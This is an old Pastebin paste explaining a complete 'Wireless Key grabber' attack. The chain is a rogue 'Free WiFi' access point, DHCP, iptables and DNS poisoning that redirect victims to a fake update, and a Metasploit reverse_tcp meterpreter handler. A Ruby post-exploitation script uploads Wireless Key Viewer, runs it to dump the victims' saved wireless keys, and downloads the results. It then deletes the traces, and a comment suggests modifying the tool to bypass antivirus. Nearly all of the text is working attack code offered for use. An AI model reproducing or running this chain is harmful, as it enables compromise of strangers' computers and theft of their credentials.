My Pastes
Public Pastes
Layout Width
Share Pastebin
Guest
Public paste!

hm2075

By: a guest | Jul 25th, 2009 | Syntax: Bash | Size: 4.60 KB | Hits: 3,457 | Expires: Never
Download | Raw | Embed | Report abuse
Copy text to clipboard
  1. Wireless Key grabber -- how the script works
  2. hm2075@hotmail.com
  3. for bt4 pre final
  4.  
  5. # Copying dhcpd.conf
  6. The first stage is copying the dhcpd.conf to its correct location
  7. Here is a peek at the dhcpd.conf
  8. ddns-update-style ad-hoc;
  9. default-lease-time 600;
  10. max-lease-time 7200;
  11. subnet 10.0.0.0 netmask 255.255.255.0 {
  12. option routers 10.0.0.1;
  13. option subnet-mask 255.255.255.0;
  14. option broadcast-address 10.0.0.0;
  15. option domain-name "example.com";
  16. option domain-name-servers 10.0.0.1;
  17. range dynamic-bootp 10.0.0.16 10.0.0.55;
  18. #range 10.0.0.20 10.0.0.50;
  19.  
  20. }
  21.  
  22. # FakeAP
  23. modprobe tun is required
  24. airmon-ng start interface   --- this sets your interface into monitor mode
  25. airbase-ng -e "Free WiFi" mon0 -v   ------ this starts a standard AP on mon0
  26.  
  27.  
  28.  
  29. # Getting metasploit ready
  30. "Loading Metasploit with hb.rc"
  31. ./msfconsole -r /root/WK/hb.rc &
  32.  
  33. lets have a look at hb.rc
  34. use exploit/multi/handler
  35. set PAYLOAD windows/meterpreter/reverse_tcp      --- I created the meterpreter.exe earlier on port 28 i.e our fake update exe
  36. set LHOST 10.0.0.1
  37. set LPORT 28
  38. set AutoRunScript /root/WK/hb.rb           ----- this is the script we want to run once the meterpreter.exe is loaded by the victim
  39. set ExitOnSession false     ----- we dont want to exit
  40. show options
  41. exploit -j      
  42.  
  43.  
  44. We shall have a quick look at hb.rb
  45.  
  46. # Wireless key harvester using wireless key viewer"
  47. require 'rex'
  48. # Extract the host and port
  49. host,port = session.tunnel_peer.split(':')
  50. print_status("New session found on #{host}:#{port}...")
  51.  
  52. # bin -- the name of our exe
  53. bin = "wkv.exe"
  54.  
  55. # output of wireless key viewer -------- we want our txt file name to be random otherwise it will get overwritten
  56. out  = Rex::Text.rand_text_alpha_upper(5) + ".txt"
  57.  
  58. #destination for the keys in txt format
  59. dest = "/root/WK/keys/"
  60. #
  61.  
  62. #
  63. #upload wireless key viewer --- modify it to bypass av's
  64. #
  65.  
  66. #
  67. print_status("Uploading Wireless Key Viewer")
  68. #
  69. sleep(1)
  70. # We upload our file to go into system drive not c: because some can be D: etc etc
  71. client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/root/WK/wkv.exe")
  72. #
  73. sleep(1)
  74. #
  75. print_status("Uploaded Wireless Key Viewer")
  76. #
  77. sleep(1)
  78. #
  79. #execute via cmd, output will be random name,
  80. #
  81. print_status("Executing wireless key viewer ")
  82. # We execute here
  83. client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stext /#{out}", nil, {'Hidden' => 'false'})
  84. #
  85. print_status("wkv file executed")
  86. #
  87. sleep(1)
  88. #
  89.  
  90. #
  91. #download keys to our keys folder
  92. # and we download keys here
  93. print_status("Downloading keys to keys folder ")
  94. #
  95. client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
  96. #
  97. print_status("Downloaded keys to keys folder ")
  98. #
  99.  
  100. #
  101.  
  102. #
  103. #delete uploaded files -- we can also clear logs here if we want to
  104. # and then we delete what we have done i.e delete wkv.exe and the txt file
  105. sleep(1)
  106. #
  107. print_status("Deleting uploaded files ")
  108. #
  109. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
  110. #
  111. client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
  112. #
  113. print_status("Have a nice day!!!!!! ")
  114.  
  115.  
  116.  
  117.  
  118. # Setting up IP tables and dhcp server
  119. echo "Setting up IPTABLES"
  120. ifconfig at0 up
  121. ifconfig lo up
  122. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  123. ifconfig at0 mtu 1400
  124. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  125. iptables --flush
  126. iptables --table nat --flush
  127. iptables --delete-chain
  128. iptables --table nat --delete-chain
  129. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  130. iptables -P FORWARD ACCEPT
  131. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  132. sleep 2
  133. /etc/init.d/dhcp3-server restart
  134. echo "IPTABLES updated and dhcp server started"
  135. sleep 2
  136.  
  137. #start webserver  --- I prefer lighttpd because I can use a custom conf file to change location of the index.html
  138. echo "starting webserver"
  139. /etc/init.d/lighttpd stop
  140. sleep 2
  141. lighttpd -f '/root/WK/lighttpd.conf'
  142. sleep 2
  143. echo "Web server started"
  144. sleep 2
  145.  
  146. #start dns poison   ---- this is straight forward, we just redirect our victims to our exploit page
  147. echo "Starting dns redirector"
  148. sleep 2
  149. cd /
  150. cd root/WK
  151. xterm -geometry 75x15+500+0 -T DNSPoison -e java ServerKernelMain 10.0.0.1 10.0.0.1&
  152. echo "DNS poison started, check DNS poison if victims are being redirected to our webserver"
  153.  
  154. sleep 2
  155.  
  156. echo "Check out /root/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited"
  157.  
  158. sleep 2
  159.  
  160. echo "Opening WKV folder, keys will be uploaded in here"
  161. sleep 2
  162. konqueror --geometry 605x305+500+500 --select /root/WK/keys/
create new paste | create new version of this paste RAW Paste Data